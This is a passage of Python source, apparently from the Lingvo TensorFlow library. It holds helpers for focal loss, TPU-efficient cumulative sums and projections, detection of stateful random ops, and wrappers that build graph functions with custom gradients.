'TruncatedNormal',
'RandomShuffle',
'Multinomial',
'RandomGamma',
'RandomPoisson',
'RandomPoissonV2',
# pyformat: enable
})
def StatefulRandomOpsInDefun(func, graph=None):
"""Checks whether the Defun depends on stateful random number ops.
  Stateful random number generator ops should be avoided in Recurrent() calls.
Otherwise, these ops produce inconsistent values between FProp and BProp.
Args:
func: a _DefinedFunction or ConcreteFunction to check.
graph: a Graph. Set None to use the default graph.
Returns:
A list of names of the stateful random ops.
Raises:
InvalidArgumentError: if the input func/graph is invalid.
"""
if graph is None:
graph = tf.get_default_graph()
func.add_to_graph(graph)
graph_def = graph.as_graph_def()
# A dict from function name to FunctionDef.
func_defs = {x.signature.name: x for x in graph_def.library.function}
if isinstance(func, function._DefinedFunction): # pylint: disable=protected-access
if func.definition.signature.name not in func_defs:
raise tf.errors.InvalidArgumentError(
          None, None, 'Defun {} is not in the graph.'.format(
func.definition.signature.name))
nodes = py_collections.deque(func.definition.node_def)
else:
nodes = py_collections.deque(func.function_def.node_def)
stateful_ops = []
# Recursively search for stateful random op.
while nodes:
node = nodes.pop()
assert isinstance(node, node_def_pb2.NodeDef), node
if node.op in _STATEFUL_RANDOM_OPS:
stateful_ops.append(node.name)
continue
def _AddDefunNodes(func_name):
"""If the given func_name is a Defun, add its sub-nodes into nodes."""
if func_name in func_defs:
nodes.extend(func_defs[func_name].node_def)
# For functional.{While|For|If} ops, add their Defun attr into search.
if node.op == 'While':
_AddDefunNodes(node.attr['body'].func.name)
_AddDefunNodes(node.attr['cond'].func.name)
elif node.op == 'For':
_AddDefunNodes(node.attr['body'].func.name)
elif node.op == 'If':
_AddDefunNodes(node.attr['then_branch'].func.name)
_AddDefunNodes(node.attr['else_branch'].func.name)
elif node.op == 'StatefulPartitionedCall':
_AddDefunNodes(node.attr['f'].func.name)
elif node.op != 'PartitionedCall':
# For other op, check whether itself is a Defun op.
_AddDefunNodes(node.op)
return stateful_ops
def ToPlaceholders(nmap, dtype=None):
"""Converts every Tensor in nmap to a placeholder."""
  def _ToPlaceholder(x):
shape = [None for _ in x.shape[:-1]] + [x.shape[-1]]
return tf.placeholder(dtype=dtype or x.dtype, shape=shape)
  return nmap.Transform(_ToPlaceholder)
def Softmax(logits, axis=None, extra_logit=None, name=None):
"""Softmax with extra_logits, might be useful for large xformer LM."""
if extra_logit is None:
return tf.nn.softmax(logits, axis=axis, name=name)
axis = -1 if axis is None else axis
def ReduceLogSumExp(x):
max_logit = tf.math.reduce_max(
tf.stop_gradient(x), axis=axis, keepdims=True)
base_logit = tf.math.maximum(max_logit, extra_logit)
x -= base_logit
exp_x = tf.math.exp(x)
sum_exp_x = tf.math.reduce_sum(exp_x, axis=axis, keepdims=True)
sum_exp_x += tf.math.exp(extra_logit - base_logit)
return tf.math.log(sum_exp_x) + base_logit
def LogSoftmax(x):
return x - ReduceLogSumExp(x)
with tf.name_scope(name):
return tf.math.exp(LogSoftmax(logits))
def SoftmaxCrossEntropyFocalLoss(logits,
label_ids=None,
label_probs=None,
alpha=None,
gamma=None,
stop_gradient_on_focal_loss_coefficient=False):
u"""Focal loss for multinomial (softmax) logistic loss.
[1] Focal loss https://arxiv.org/abs/1708.02002
Args:
logits: [..., C]. Logits for the multinomial logistic regression. C is the
number of classes.
label_ids: [...]. Each entry in labels must be an index in [0, C).
label_probs: [..., C]. Each vector along last dimension must be a valid
probability distribution.
alpha: [C]. The weighting factor alpha. Eq (3) in [1].
gamma: []. Tunable focusing parameter. Eq (4) in [1].
stop_gradient_on_focal_loss_coefficient: If true, stops gradient on the
focal loss coefficient (1-p)^gamma to stabilize the gradient.
Returns:
loss[i..., j] = FL(pₜ) = - αₜ(1-pₜ)ˠlog(pₜ) Eq (5) in [1].
"""
def _ApplyFocalLossCoefficient(loss, log_probs):
if gamma is not None and gamma != 0:
probs = tf.exp(log_probs)
coefficient = tf.pow(1.0 - probs, gamma)
if stop_gradient_on_focal_loss_coefficient:
coefficient = tf.stop_gradient(coefficient)
loss *= coefficient
return loss
if label_probs is not None:
log_probs = tf.nn.log_softmax(logits)
loss = -(label_probs * log_probs)
loss = _ApplyFocalLossCoefficient(loss, log_probs)
if alpha is not None:
loss *= tf.reshape(
alpha, tf.concat([tf.ones(tf.rank(loss) - 1, tf.int32), [-1]],
axis=0))
loss = tf.reduce_sum(loss, axis=-1)
else:
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=label_ids, logits=logits)
loss = _ApplyFocalLossCoefficient(loss, -loss)
if alpha is not None:
loss *= tf.gather(alpha, label_ids)
return loss
def SigmoidCrossEntropyFocalLoss(logits, labels, alpha=None, gamma=None):
u"""Focal loss for binary (sigmoid) logistic loss.
[1] Focal loss https://arxiv.org/abs/1708.02002
Args:
logits: [..., C]. Logits for the sigmoid logistic regression.
labels: [..., C]. 0/1 labels.
alpha: The weighting factor alpha. Eq (3) in [1].
gamma: Tunable focusing parameter. Eq (4) in [1].
Returns:
loss[i..., j] = FL(pₜ) = - αₜ(1-pₜ)ˠlog(pₜ) Eq (5) in [1].
"""
# [1] Eq (4).
#
# The numerically-stable way to compute
# log(p) for positives;
# log(1 - p) for negatives.
loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=labels, logits=logits)
if gamma is not None and gamma != 0:
# The modulating factor. Note that
# (1 - p)ˠ = [1 - σ(x)]ˠ = [σ(-x)]ˠ, for positives.
# pˠ = [σ(x)]ˠ, for negatives.
loss *= tf.pow(tf.sigmoid(logits * (1 - labels * 2)), gamma)
if alpha is not None:
# [1] Eq (3)
loss *= (alpha * labels + (1 - alpha) * (1 - labels))
return loss
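# A minimal usage sketch (illustrative values; the result has the same shape
# as the logits):
#   loss = SigmoidCrossEntropyFocalLoss(
#       logits=tf.constant([[2.0, -1.0]]),
#       labels=tf.constant([[1.0, 0.0]]),
#       alpha=0.25, gamma=2.0)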
_RECORD_FORMAT_RE = re.compile('(^[A-Za-z_]+):(.*)')
def RecordFormatFromFilePattern(file_pattern):
"""Return the record format string for a Lingvo file pattern.
Lingvo file patterns take the form of:
tfrecord:/path/to/bar -> tfrecord is the record_format.
This function takes a file pattern and returns a string indicating
which format the filepattern implies.
Args:
file_pattern: String file pattern.
Returns:
Tuple (string, string):
- record_format: String record format, e.g., "tfrecord", etc.
- file_pattern: The file pattern without any prefixes.
"""
result = re.match(_RECORD_FORMAT_RE, file_pattern)
if result is None:
# TODO(vrv): Fix all callers so that file_pattern must contain
# the record format prefix.
return 'sstable', file_pattern
# regexp ensures that a match implies there are two groups:
# the record format and then the file pattern.
return result.groups()
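# A minimal usage sketch (illustrative path):
#   RecordFormatFromFilePattern('tfrecord:/path/to/bar') gives:
#   ('tfrecord', '/path/to/bar')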
def ReadFileLines(file_path):
"""Read a text file and return the lines.
If the file cannot be found at the given path, attempt to load it from the
Lingvo package (useful for data dependencies in par files).
Args:
file_path: path to file, either absolute or relative to the bazel workspace.
Returns:
A list of lines from the file.
"""
if not tf.io.gfile.exists(file_path):
try:
lines = pkgutil.get_data(
'lingvo', file_path.replace('lingvo/', '',
1)).splitlines(True)
except IOError:
# If pkgutil can't find the file, continue and let GFile raise the error.
lines = None
else:
lines = None
if not lines:
with tf.io.gfile.GFile(file_path, 'r') as f:
lines = f.readlines()
return lines
# Partially borrowed from
# https://github.com/tensorflow/tensor2tensor/blob/32929305e1a4ec926eff24123758b794df35492b/tensor2tensor/layers/common_layers.py#L349
def CumSum(x, axis=0, exclusive=False, use_einsum=False):
"""A TPU efficient implementation of tf.cumsum().
  This is equivalent to tf.cumsum and is faster on TPU as of 08/2019 unless
  the axis dimension is very large. The current TensorFlow implementation is
  based on scanning and reducing, which is not efficient on TPU.
Args:
x: An input Tensor.
axis: An int for the axis.
exclusive: A bool for performing exclusive cumsum.
use_einsum: If true, use einsum on TPU.
Returns:
A Tensor of the same shape as x.
Raises:
ValueError: if the input axis is invalid.
"""
if x.dtype not in (tf.float32, tf.bfloat16) or not use_tpu():
# Fallback to tf.cumsum when inputs are not floats or not running on TPU.
return tf.cumsum(x, axis=axis, exclusive=exclusive)
rank = GetRank(x)
# Needs to know the rank for the final transpose if axis is not the last
# dimension. Otherwise, falls back to tf.cumsum.
if not isinstance(rank, int) and axis != -1:
return tf.cumsum(x, axis=axis, exclusive=exclusive)
if axis < -1:
if axis + rank < 0:
raise ValueError('Unexpected axis: %d (rank = %d)' % (axis, rank))
axis += rank
if use_einsum:
assert isinstance(rank, int) and rank < 26, rank
# Use einsum to avoid data formatting overhead.
a2z = ''.join([chr(i) for i in range(97, 123)]) # abc...xyz
src = a2z[:rank]
if axis == -1:
tgt = src[:-1] + 'z'
else:
tgt = src[:axis] + 'z' + src[axis + 1:]
length = GetShape(x)[axis]
causal_mask = tf.linalg.band_part(
tf.ones([length, length], dtype=x.dtype), 0, -1)
return tf.einsum(f'{src},{src[axis]}z->{tgt}', x, causal_mask)
length = GetShape(x)[axis]
my_range = tf.range(length)
comparator = tf.less if exclusive else tf.less_equal
mask = tf.cast(
comparator(tf.expand_dims(my_range, 1), tf.expand_dims(my_range, 0)),
x.dtype)
result = tf.tensordot(x, mask, axes=[[axis], [0]])
if axis != -1 and axis != rank - 1:
result = tf.transpose(
result,
list(range(axis)) + [rank - 1] + list(range(axis, rank - 1)))
return result
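# A minimal usage sketch (illustrative values; falls back to tf.cumsum off-TPU):
#   CumSum(tf.constant([[1., 2., 3.]]), axis=-1) gives: [[1., 3., 6.]]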
def ProjectLastDim(inputs, weight, input_dim, output_dim):
"""Linear projection on the last dim of the input tensor.
This is a TPU efficient implementation to avoid reshaping inputs to Rank-2
tensor by using Einsum for the compute.
Args:
inputs: An input Tensor, the last dimension of which is input_dim.
weight: A weight matrix with shape [input_dim, output_dim].
input_dim: An integer or a symbolic dim, the last dimension of the inputs.
output_dim: An integer or a symbolic dim, the last dimension of the outputs.
Returns:
An output Tensor of the same rank as inputs, the last dimension is
output_dim.
"""
input_dim = int(
symbolic.ToStatic(input_dim) if symbolic.IsExpr(input_dim) else input_dim)
output_dim = int(
symbolic.ToStatic(output_dim) if symbolic.IsExpr(output_dim
) else output_dim)
# Assert input_dim and output_dim
inputs = with_dependencies([assert_equal(GetShape(inputs)[-1], input_dim)],
inputs)
weight = with_dependencies([
assert_equal(GetShape(weight)[0], input_dim),
assert_equal(GetShape(weight)[-1], output_dim)
], weight)
if (use_tpu() and inputs.shape is not None and
inputs.shape.rank is not None and inputs.shape.rank < 26):
# Avoids reshape if feasible and uses Einsum.
if inputs.shape.rank == 2:
outputs = tf.matmul(inputs, weight)
else:
# This is equivalent to:
# outputs = tf.einsum('...y,yz->...z', inputs, weight)
# Unfortunately ... in einsum() leads to extra HBM usage.
s = ''.join([chr(x) for x in range(97, 123)]) # abc...xyz
r = inputs.shape.rank
outputs = tf.einsum('{0}y,yz->{0}z'.format(s[:r - 1]), inputs, weight)
else:
outputs = Matmul(tf.reshape(inputs, ToStaticShape([-1, input_dim])), weight)
outputs = tf.reshape(
outputs,
tf.concat([
tf.cast(GetShape(inputs)[:-1], tf.int32),
ToStaticShape([output_dim])
],
axis=0))
return outputs
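# A minimal usage sketch (x and w are assumed tensors of shape [batch, time, 8]
# and [8, 16] respectively):
#   y = ProjectLastDim(x, w, input_dim=8, output_dim=16)
#   # y has shape [batch, time, 16].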
@contextlib.contextmanager
def RemoveAssertContext(remove=True):
"""Hacks to replace certain unwanted tensorflow ops."""
  # TODO(zhifengc/huangyp): Consider implementing an assert_equal
  # op replacement for lingvo, since assert_equal doesn't support strings on GPUs.
# Hack to replace tf.assert_equal
# TODO(b/136040013): Remove this after migration to tf.function.
if remove:
saved_assert_equal = tf.check_ops.assert_equal
def NoOP(*args, **kwargs): # pylint: disable=unused-argument
return tf.no_op()
tf.check_ops.assert_equal = NoOP # Make assert_equal a no op.
try:
yield
finally:
tf.check_ops.assert_equal = saved_assert_equal
else:
yield
def _AssertInputsMatch(op, args, implicit_captures):
"""Assert that op's inputs match with args and implicit_captures.
Args:
op: The operation to check.
args: A nested structure representing the explicit arguments of 'op'.
implicit_captures: A nested structure representing the implicitly captured
inputs of 'op'.
Raises:
ValueError: if the number of inputs mismatch.
"""
expected_inputs = Flatten([args, implicit_captures])
expected_num_inputs = len(expected_inputs)
if len(op.inputs) > expected_num_inputs:
raise ValueError(('Too many inputs. The most likely cause is that fwd '
'captures additional tensors: extra inputs %r vs %r '
'captures=%r') % (list(op.inputs), list(expected_inputs),
list(Flatten(implicit_captures))))
if len(op.inputs) < expected_num_inputs:
raise ValueError(('Mismatched inputs to fwd: Found %d vs expected %d: %r'
'. Implicit captures(%d) = %r') %
(len(op.inputs), expected_num_inputs, list(op.inputs),
len(Flatten(implicit_captures)), implicit_captures))
def TensorSpecs(nmap, keep_shape=True):
"""Transforms tensors in the input nested structure to TensorSpecs."""
if nmap is None:
return None
fn = lambda t: tf.TensorSpec(t.shape if keep_shape else None, t.dtype)
return Transform(fn, nmap)
def _DefineDefun(fwd, fwd_sig, bak=None, bak_as_function=False, device=None):
"""Wraps fwd in a defun with custom gradient bak.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure.
fwd_sig: A Nested Structure of tf.TensorSpec representing the input
signature of `fwd`, or None (meaning that fwd takes no inputs).
bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
Structure. The custom backprop function for `fwd`. bak needs to return
dcapture if fwd uses any implicitly captured tensors, whose gradients are
dcapture.
bak_as_function: Whether to create a TF graph function for `bak`.
device: the device on which to run `fwd` and `bak`.
Returns:
A NestedMap containing:
- call: A callable that will execute `fwd`. It has the same input and output
signatures as `fwd`.
- func: The underlying TF function that `call` calls. If not None, it will
be a _DefinedFunction or ConcreteFunction that takes flat inputs and
returns flat outputs, and can be used by routines that require a TF
function object (e.g. tf.If, tf.While, etc).
Always not None when `bak` is None.
- output_dtypes: A nested structure compatible with the outputs of `fwd`
containing the corresponding output dtypes.
- stateful_ops: A list of (op_name, op_type) tuples representing the
stateful ops used by `fwd`.
- captured_inputs: Implicit inputs captured by `fwd`.
"""
assert fwd is not None
noinline = not use_xla()
if fwd_sig is None:
fwd_sig = []
get_dtype = lambda x: x.dtype
arg_dtypes = Flatten(Transform(get_dtype, fwd_sig))
get_shape = lambda x: x.shape
arg_shapes = Flatten(Transform(get_shape, fwd_sig))
# Used to hold the backward function used by Grad, which will be defined if
# bak is set.
sigs = NestedMap()
# Output of this method.
res = NestedMap()
python_grad_func = None
if bak:
def Grad(op, *args):
"""Gradient function for the forward function.
Args:
op: The forward operation.
*args: Gradients wrt op.outputs.
Returns:
Tuple of derivatives.
"""
_AssertInputsMatch(op, fwd_sig, res.captured_inputs)
# Ensure dys contains no None.
args = ConvertNoneGradientToZeros(list(op.outputs), list(args))
xs = op.inputs[:len(arg_dtypes)] # The rest are captures.
return sigs.backward(*Flatten([xs, op.outputs, args]))
python_grad_func = Grad
def _SetShape(dst_list, shape_list):
for dst, shape in zip(dst_list, shape_list):
if isinstance(dst, tf.Tensor):
dst.set_shape(shape)
@tf.Defun(*arg_dtypes, python_grad_func=python_grad_func, noinline=noinline)
def Forward(*args):
"""The forward function."""
_SetShape(args, arg_shapes)
with RemoveAssertContext(remove=noinline):
call = lambda: fwd(Pack(fwd_sig, args)) if args else fwd()
if device is None:
# Defun will handle the device assignment.
rets = call()
else:
with tf.device(device):
rets = call()
res.outputs = rets
return Flatten(rets)
forward = Forward
if not arg_dtypes:
    # In this case Forward is an _OverloadedFunction; we need to instantiate it.
forward = Forward.instantiate([])
# Invokes fwd() to get res.outputs.
forward.add_to_graph(tf.get_default_graph())
res.func = forward
res.stateful_ops = forward.stateful_ops
res.captured_inputs = forward.captured_inputs
output_dtypes = Transform(get_dtype, res.outputs)
output_shapes = Transform(get_shape, res.outputs)
def Call(args=None):
"""Wrapper of fwd."""
if args is None:
flat_rets = forward()
else:
flat_rets = forward(*Flatten(args))
if not isinstance(flat_rets, (tuple, list)):
flat_rets = [flat_rets]
_SetShape(flat_rets, Flatten(output_shapes))
return Pack(output_dtypes, flat_rets)
res.call = Call
if bak:
def Backward(*args):
"""The backward function."""
_SetShape(args, Flatten([arg_shapes, output_shapes, output_shapes]))
xs, ys, dys = Pack([fwd_sig, output_dtypes, output_dtypes], args)
with RemoveAssertContext(remove=noinline):
if device is None:
# Defun will handle the device assignment.
dxs = bak(xs, ys, dys)
else:
with tf.device(device):
dxs = bak(xs, ys, dys)
return Flatten(dxs)
if bak_as_function:
sigs.backward = tf.Defun(
*Flatten([arg_dtypes, output_dtypes, output_dtypes]),
noinline=noinline)(
Backward)
sigs.backward.add_to_graph(tf.get_default_graph())
else:
sigs.backward = Backward
return res
# Global variable to control rendezvous sharing in tf.function.
# If False (default), rendezvous sharing is disabled in tf.function, that is, the
# function body uses a separate rendezvous and can't communicate with the parent
# graph via send/recv.
# With _GetSharedRendezvous() == True, the function body shares the same
# rendezvous with the parent graph and can talk to it using send/recv. This is
# useful for layers like StackedRecurrent.
_SHARED_RENDEZVOUS = ThreadLocalStack()
@contextlib.contextmanager
def _SharedRendezvousScope(shared_rendezvous=True):
_SHARED_RENDEZVOUS.stack.append(shared_rendezvous)
try:
yield
finally:
_SHARED_RENDEZVOUS.stack.pop()
def _GetSharedRendezvous():
"""Get the current rendezvous sharing setting."""
return _SHARED_RENDEZVOUS.stack[-1] if _SHARED_RENDEZVOUS.stack else False
def _ApplySharedRendezvous(func):
"""Apply the rendezvous sharing setting on the given tf.function func."""
# pylint: disable=protected-access
func._shared_rendezvous = _GetSharedRendezvous()
# pylint: enable=protected-access
def _WrapFunction(func=None, input_signature=None):
"""Wraps func as a tf.function."""
if input_signature is None:
input_signature = []
def Decorated(fn):
@tf.function(input_signature=input_signature, autograph=False)
def Fn(*args):
      # TODO(b/163904067): mimic Defun's behavior and reset the step seed to
# avoid it being used as an implicit capture. This is not a desired
# behavior, it should take the step seed from parent graph instead.
ResetStepSeed()
# Mimic Defun and disable collection sharing.
graph = tf.get_default_graph()
# Don't share summaries collection with parent graph (b/168745134).
graph.clear_collection(tf.GraphKeys.SUMMARIES)
return fn(*args)
_ApplySharedRendezvous(Fn)
# Add the function to the graph so it'll be traced under the current
# context. This is necessary if the function body captures any non-tensor
# values from the environment, like symbolic maps.
cf = Fn.get_concrete_function()
cf.add_to_graph()
return cf
# For the `foo = _WrapFunction(foo, ...)` use case.
if func is not None:
return Decorated(func)
# For the `@_WrapFunction(...)` use case.
return Decorated
def _DefineFunction(fwd, fwd_sig, bak=None, bak_as_function=False, device=None):
"""Wraps fwd in a defun with custom gradient bak.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure.
fwd_sig: A Nested Structure of tf.TensorSpec representing the input
signature of `fwd`, or None (meaning that fwd takes no inputs).
bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
Structure. The custom backprop function for `fwd`. bak needs to return
dcapture if fwd uses any implicitly captured tensors, whose gradients are
dcapture.
bak_as_function: Whether to create a TF graph function for `bak`.
device: the device on which to run `fwd` and `bak`.
Returns:
A NestedMap containing:
- call: A callable that will execute `fwd`. It has the same input and output
signatures as `fwd`.
- func: The underlying TF function that `call` calls. If not None, it will
be a _DefinedFunction or ConcreteFunction that takes flat inputs and
returns flat outputs, and can be used by routines that require a TF
function object (e.g. tf.If, tf.While, etc).
Always not None when `bak` is None.
- outputs: The outputs of `fwd`. Used for reflection only (e.g. to get the
output dtypes, shapes, etc).
- stateful_ops: A list of (op_name, op_type) tuples representing the
stateful ops used by `fwd`.
- captured_inputs: Implicit inputs captured by `fwd`.
"""
assert fwd is not None
noinline = not use_xla()
if fwd_sig is None:
fwd_sig = []
if device is None:
# Get the current device to mimic Defun's behavior.
# pylint: disable=protected-access
device_funcs = tf.get_default_graph()._device_functions_outer_to_inner
device = device_funcs[-1] if device_funcs else None
# pylint: enable=protected-access
# Output of this method.
res = NestedMap()
@_WrapFunction(input_signature=Flatten(fwd_sig))
def Forward(*args):
"""The forward function."""
with RemoveAssertContext(remove=noinline), tf.device(device):
if args:
xs = Pack(fwd_sig, args)
rets = fwd(xs)
else:
rets = fwd()
res.outputs = rets
return Flatten(rets)
res.captured_inputs = Forward.captured_inputs
  # Get the stateful ops used in fwd. Logic borrowed from
# _EagerDefinedFunction.__init__().
graph = Forward.graph
input_ops = set(arg.op for arg in graph.inputs)
operations = [op for op in graph.get_operations() if op not in input_ops]
res.stateful_ops = [(o.name, o.type) for o in operations if o._is_stateful] # pylint: disable=protected-access
def Call(func, args=None):
"""Wrapper of fwd."""
if args is None:
flat_rets = func()
else:
flat_rets = func(*Flatten(args))
if not isinstance(flat_rets, (tuple, list)):
flat_rets = [flat_rets]
return Pack(res.outputs, flat_rets)
if not bak:
res.func = Forward
res.call = lambda args=None: Call(Forward, args)
return res
shared_rendezvous = _GetSharedRendezvous()
ret_specs = TensorSpecs(res.outputs)
def Backward(*args):
xs, ys, dys = Pack([fwd_sig, ret_specs, ret_specs], args)
with RemoveAssertContext(remove=noinline), tf.device(device):
dxs = bak(xs, ys, dys)
return Flatten(dxs)
if bak_as_function:
backward_cf = _WrapFunction(
Backward, input_signature=Flatten([fwd_sig, ret_specs, ret_specs]))
else:
def BackwardWithSharedRendezvous(*args):
with _SharedRendezvousScope(shared_rendezvous):
return Backward(*args)
backward_cf = BackwardWithSharedRendezvous
@tf.custom_gradient
def ForwardWithGrad(*args):
"""Forward function and its custom gradient."""
# Note that `args` includes implicit captures. This is required by
# tf.custom_gradient so that when the Grad() outputs include gradients to
# implicit captures, they match the inputs to ForwardWithGrad().
#
# However, Forward doesn't take implicit captures as input, so we exclude
# them here.
fwd_args = args[:(len(args) - len(Flatten(res.captured_inputs)))]
op = NestedMap(inputs=args, outputs=Forward(*fwd_args))
def Grad(*args, **kwargs):
"""Gradient function for the forward function.
Args:
*args: Gradients wrt op.outputs.
**kwargs: Additional arguments from tf.custom_gradient.
Returns:
Tuple of derivatives.
"""
if kwargs:
tf.logging.warning(
'Ignoring additional arguments used by tf.custom_gradient: %s',
str(kwargs))
_AssertInputsMatch(op, fwd_sig, res.captured_inputs)
# Ensure dys contains no None.
args = ConvertNoneGradientToZeros(list(op.outputs), list(args))
xs, _ = Pack([fwd_sig, res.captured_inputs], op.inputs)
return backward_cf(*Flatten([xs, op.outputs, args]))
return op.outputs, Grad
res.func = None
forward = lambda *xs: ForwardWithGrad(*Flatten([xs, res.captured_inputs]))
res.call = lambda args=None: Call(forward, args)
return res
# Global variable to control whether to use tf.function.
# If not set, the result is determined by tf2 status. See _UseTfFunction for
# details.
# TODO(laigd): remove after b/169869929 is fixed.
_USE_TF_FUNCTION = ThreadLocalStack()
# Constants for propagating framework tensors through Function.
_FRAMEWORK_TENSOR_GLOBAL_STEP = '_global_step'
@contextlib.contextmanager
def TfFunctionScope(use_tf_function=True):
_USE_TF_FUNCTION.stack.append(use_tf_function)
try:
yield
finally:
_USE_TF_FUNCTION.stack.pop()
def _UseTfFunction():
"""Whether to use tf.function instead of tf.Defun."""
if _USE_TF_FUNCTION.stack:
return _USE_TF_FUNCTION.stack[-1]
return tf2_enabled()
class Function(object):
"""Function builds a TensorFlow graph function from a callable.
In the high level this is similar to tf.Defun and tf.function. In fact this
relies on those as underlying implementations, but with specific configuration
so it's easier to use and can work well in some extreme cases in Lingvo.
Example usage:
- No inputs:
>>> @Function()
... def foo():
... return tf.constant(1.0)
>>> y = foo()
- Scalar input:
>>> @Function(fwd_sig=tf.TensorSpec(None, tf.float32))
... def foo(x):
... return x * 2
>>> y = foo(1.0)
- List input:
>>> @Function(fwd_sig=[tf.TensorSpec(None, tf.float32) for _ in range(2)])
... def foo(xs):
... return xs[0] + xs[1]
>>> y = foo([1.0, 2.0])
- Nested input:
>>> @Function(fwd_sig=NestedMap(x=tf.TensorSpec(None, tf.float32)))
... def foo(nmap):
... return nmap.x * 2
>>> y = foo(NestedMap(x=1.0))
- With custom gradient function (other input types mentioned above are also
supported):
>>> def bar(x, y, dy):
... del y, dy
... return 4.0 * x * dy
>>>
>>> @Function(fwd_sig=tf.TensorSpec(None, tf.float32), bak=bar)
... def foo(x):
... return 2.0 * x * x
- Used in control flow ops:
>>> then_branch = Function(tf.TensorSpec([], tf.int32))(lambda x: x / 2)
>>> else_branch = Function(tf.TensorSpec([], tf.int32))(lambda x: 3 * x + 1)
>>> y = tf.If(cond, inputs, then_branch.func, else_branch.func)
"""
# TODO(laigd): the use_tf_function option is added for backward compatibility
# reasons. Remove it after the migration.
def __init__(self,
fwd_sig=None,
bak=None,
bak_as_function=False,
device=None,
use_tf_function=None):
"""Constructor.
Below we assume `fwd` is the input to `__call__` that is used to build the
TensorFlow graph function encapsulated by this object.
Args:
fwd_sig: A Nested Structure of tf.TensorSpec representing the input
signature of `fwd`, or None (meaning that `fwd` takes no inputs). The
actual inputs should be compatible with this (have same shapes and
dtypes).
bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
Structure. The custom backprop function for `fwd`. bak needs to return
dcapture if `fwd` uses any implicitly captured tensors, whose gradients
are dcapture.
bak_as_function: Whether to create a TF graph function for `bak`.
device: The device on which to run `fwd` and `bak`. Defaults to the
current device.
      use_tf_function: Whether to use tf.function. Defaults to _UseTfFunction().
"""
self._fwd_sig = fwd_sig
self._bak = bak
self._bak_as_function = bak_as_function
self._device = device
self._use_tf_function = use_tf_function
def __call__(self, fwd):
"""Creates a graph function.
Args:
fwd: a callable xs: Nested Structure -> ys: Nested Structure.
Returns:
A DefinedFunction object encapsulating `fwd` as a graph function.
"""
assert callable(fwd)
return DefinedFunction(fwd, self._fwd_sig, self._bak, self._bak_as_function,
self._device, self._use_tf_function)
class DefinedFunction(object):
"""Encapsulates a TensorFlow graph function and its properties."""
def __init__(self,
fwd,
fwd_sig=None,
bak=None,
bak_as_function=False,
device=None,
use_tf_function=None):
"""Constructor.
Args:
fwd: A callable xs: Nested Structure -> ys: Nested Structure. Used to
build the TensorFlow graph function that this object encapsulates.
fwd_sig: A Nested Structure of tf.TensorSpec representing the input
signature of `fwd`, or None (meaning that `fwd` takes no inputs). The
actual inputs should be compatible with this (have same shapes and
dtypes).
bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
Structure. The custom backprop function for `fwd`. bak needs to return
dcapture if `fwd` uses any implicitly captured tensors, whose gradients
are dcapture.
bak_as_function: Whether to create a TF graph function for `bak`.
device: The device on which to run `fwd` and `bak`. Defaults to the
current device.
      use_tf_function: Whether to use tf.function. Defaults to _UseTfFunction().
"""
self._fwd_sig = fwd_sig
wrapped_fwd_sig = fwd_sig
fwd_fn = fwd
bak_fn = bak
graph_random_seed = None
if tf.get_default_graph().seed is not None:
graph_random_seed = tf.get_default_graph().seed
# Wrap the forward function to propagate framework tensors like step_seed
# and global_step.
wrapped_fwd_sig = NestedMap()
self._added_global_step = False
if GetGlobalStep() is not None:
wrapped_fwd_sig[_FRAMEWORK_TENSOR_GLOBAL_STEP] = (
tf.TensorSpec([], tf.int64))
self._added_global_step = True
if fwd_sig is not None:
wrapped_fwd_sig.inputs = fwd_sig
elif not wrapped_fwd_sig:
wrapped_fwd_sig = None
def ForwardWrapped(wrapped_inputs=None):
if graph_random_seed is not None:
tf.random.set_seed(graph_random_seed)
global_step = None
if wrapped_inputs:
assert isinstance(wrapped_inputs, NestedMap)
global_step = wrapped_inputs.get(_FRAMEWORK_TENSOR_GLOBAL_STEP, None)
with GlobalStepContext(global_step):
if wrapped_inputs and 'inputs' in wrapped_inputs:
result = fwd(wrapped_inputs.inputs)
else:
result = fwd()
return result
fwd_fn = ForwardWrapped
if bak:
# Wrap the backward function to return zero gradients for framework
# tensors like step_seed and global_step.
def BackwardWrapped(wrapped_xs, ys, dys):
if graph_random_seed is not None:
tf.random.set_seed(graph_random_seed)
with GlobalStepContext(
wrapped_xs.get(_FRAMEWORK_TENSOR_GLOBAL_STEP, None)):
result = bak(wrapped_xs.inputs, ys, dys)
dxs = Transform(tf.zeros_like, wrapped_xs)
if isinstance(result, tuple) and len(result) == 2:
dxs.inputs, dcapture = result
return dxs, dcapture
else:
dxs.inputs = result
return dxs
bak_fn = BackwardWrapped
if use_tf_function is None:
use_tf_function = _UseTfFunction()
fn = _DefineFunction if use_tf_function else _DefineDefun
self._data = fn(
fwd=fwd_fn,
fwd_sig=wrapped_fwd_sig,
bak=bak_fn,
bak_as_function=bak_as_function,
device=device)
def __call__(self, args=None):
"""Invokes the graph function.
Args:
args: the inputs to the graph function, must be compatible with `fwd_sig`.
Returns:
The output tensors with the same structure as the output of `fwd`,
returned by a call to the graph function.
"""
assert IsCompatible(args,
self._fwd_sig), '{} vs {}'.format(args, self._fwd_sig)
return self._data.call(self.AddFrameworkInputs(args))
@property
def func(self):
"""The underlying TensorFlow graph function that this object encapsulates.
The returned graph function is created by tracing `fwd` during construction.
If not None, it will be a _DefinedFunction or ConcreteFunction that takes
flat inputs and returns flat outputs, and can be used by routines that
require a TensorFlow function object (e.g. tf.If, tf.While, etc).
If no backprop function is provided during construction, the result is
always not None.
"""
return self._data.func
def AddFrameworkInputs(self, inputs):
"""Add framework tensors like step_seed and global_step to inputs.
This is only necessary when using `func`, as wrapping is handled
automatically in __call__.
Args:
inputs: inputs to the function.
Returns:
Inputs wrapped with framework tensors suitable for use with `func`.
"""
result = NestedMap()
if self._added_global_step:
global_step = GetGlobalStep()
assert global_step is not None
result[_FRAMEWORK_TENSOR_GLOBAL_STEP] = tf.cast(global_step, tf.int64)
if inputs is not None:
result.inputs = inputs
return result if result else None
@property
def output_dtypes(self):
"""Output dtypes of the graph function.
The result will have the same structure as the outputs of `fwd` but contain
the corresponding output dtypes.
"""
return Transform(lambda x: x.dtype, self._data.outputs)
@property
def stateful_ops(self):
"""Stateful ops used by `fwd`, as a list of (op_name, op_type) tuples."""
